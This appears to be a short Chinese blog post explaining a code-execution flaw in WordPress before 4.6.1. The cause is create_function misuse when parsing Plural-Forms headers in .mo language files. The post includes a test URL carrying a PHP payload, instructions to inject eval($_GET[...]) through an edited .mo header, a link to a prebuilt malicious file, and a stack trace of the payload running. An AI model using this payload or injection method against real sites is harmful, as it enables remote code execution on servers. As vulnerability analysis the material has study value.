wordpress <4.6.1 语言文件导致的代码执行
来源:互联网 发布:40岁程序员干不了 编辑:程序博客网 时间:2024/06/07 04:43
1.原因:
create_function的误用
这里可以看到栈调用信息
http://127.0.0.1/wordpress/?c=$e=new%20Exception;%20var_dump($e-%3EgetTraceAsString());;
function make_plural_form_function($nplurals, $expression) { $expression = str_replace('n', '$n', $expression); $func_body = " \$index = (int)($expression); return (\$index < $nplurals)? \$index : $nplurals - 1;"; return create_function('$n', $func_body);}
修改header头,通过修改语言包mo文件(工具 PoEdit),闭合对应的语句,然后达到代码执行的目的,也可以下载大神修改好的mo自己测试 https://gist.github.com/anonymous/908a087b95035d9fc9ca46cef4984e97string(1334) "#0 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(171) : runtime-created function(2): eval() #1 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(171): create_function('$n', '\n\t\t\t$index = (i...') #2 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(224): Gettext_Translations->make_plural_form_function(1, 'n);}eval($_GET[...') #3 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(62): Gettext_Translations->set_header('Plural-Forms', 'nplurals=1; plu...') #4 C:\xampp\htdocs\wordpress\wp-includes\pomo\mo.php(210): Translations->set_headers(Array) #5 C:\xampp\htdocs\wordpress\wp-includes\pomo\mo.php(27): MO->import_from_reader(Object(POMO_FileReader)) #6 C:\xampp\htdocs\wordpress\wp-includes\l10n.php(342): MO->import_from_file('C:\\xampp\\htdocs...') #7 C:\xampp\htdocs\wordpress\wp-includes\l10n.php(388): load_textdomain('default', 'C:\\xampp\\htdocs...') #8 C:\xampp\htdocs\wordpress\wp-settings.php(268): load_default_textdomain() #9 C:\xampp\htdocs\wordpress\wp-config.php(87): require_once('C:\\xampp\\htdocs...') #10 C:\xampp\htdocs\wordpress\wp-load.php(29): require_once('C:\\xampp\\htdocs...') #11 C:\xampp\htdocs\wordpress\wp-blog-header.php(12): require_once('C:\\xampp\\htdocs...') #12 C:\xampp\htdocs\wordpress\index.php(18): require('C:\\xampp\\htdocs...') #13 {main}"
效果图
0 0
- wordpress <4.6.1 语言文件导致的代码执行
- wordpress文件代码分析
- 百度统计代码导致wordpress静态文件使用二级域名有cookie
- WordPress主题文件的执行顺序及其层次结构详解
- WordPress主题文件的执行顺序及其层次结构
- wordpress中wp-syntax支持的语言代码
- WordPress-Mailpress插件远程代码执行漏洞
- windows下c语言获取程序当前的执行目录,读文件的代码片
- WordPress常用的代码
- Wordpress siteurl的问题导致无法登陆
- wordpress执行php文件 [大三TJB_708]
- WordPress 主题文件结构及执行
- C++ 和C 语言混合代码导致的问题
- c语言文件的执行过程
- WScript.Shell导致JS代码不能执行
- Struts2 devMode导致远程代码执行漏洞
- ecshop SQL注入漏洞导致代码执行
- ajaxFileUpload返回的json数据带<pre>标签,导致无法执行success后面的代码
- PBOC2.0/EMV之TLV格式解析(C++)
- ACM Buy Tickets
- 对韦东山老师移植最新uboot的总结
- Redis实现简单消息队列
- java project单独使用hibernate
- wordpress <4.6.1 语言文件导致的代码执行
- 在Linux操作系统下安装JAVA8
- 如果你没想好要不要做程序媛
- Leetcode 113. Path Sum II
- 【CSS/JS学习】如何实现单行/多行文本溢出的省略(...)
- 代码自动生成.编程语言
- 支持向量机中相关问题思考
- 360极速浏览器和360chrome首页设置加密算法
- LintCode : 翻转链表